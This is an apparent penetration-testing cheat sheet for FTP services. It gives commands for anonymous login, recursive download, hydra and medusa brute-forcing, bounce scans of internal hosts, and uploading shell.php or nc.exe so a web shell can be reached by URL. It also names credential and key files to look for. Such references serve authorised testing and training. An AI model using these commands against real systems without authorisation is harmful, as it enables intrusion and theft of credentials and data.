Skip to main content

Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Use this file to discover all available pages before exploring further.

Service Detection

nmap -sV -sC -p 21 TARGET

nc -nv TARGET 21

Anonymous Login

ftp TARGET
# Username: anonymous
# Password: (empty or any email)

ftp -A TARGET

Download Everything

wget -r ftp://anonymous:anonymous@TARGET/

Enumeration

List Files

ftp> ls -la
ftp> dir

Download File

ftp> get file.txt
ftp> mget *.txt

Upload File

ftp> put shell.php
ftp> mput *.txt

Binary Mode (for executables)

ftp> binary
ftp> put nc.exe

Brute-Force

hydra -L users.txt -P passwords.txt ftp://TARGET

medusa -h TARGET -U users.txt -P passwords.txt -M ftp

Interesting Files

Look for:
  • .htpasswd
  • web.config
  • backup.zip
  • *.conf
  • SSH keys
  • Database dumps

FTP Bounce Attack

Use FTP server to port scan internal hosts. 
nmap -Pn -b anonymous:anonymous@FTP_SERVER INTERNAL_TARGET

FTP + Web Shell

If FTP root maps to web root: 
ftp> put shell.php
Access: 
http://TARGET/shell.php?cmd=id

NSE Scripts

nmap -p 21 --script ftp-anon TARGET
nmap -p 21 --script ftp-brute TARGET
nmap -p 21 --script ftp-vuln* TARGET

Quick Reference

CheckCommand
Anonymous loginftp -A TARGET
Brute-forcehydra -L users.txt -P pass.txt ftp://TARGET
Download allwget -r ftp://anonymous:@TARGET/
Bounce scannmap -b user:pass@FTP INTERNAL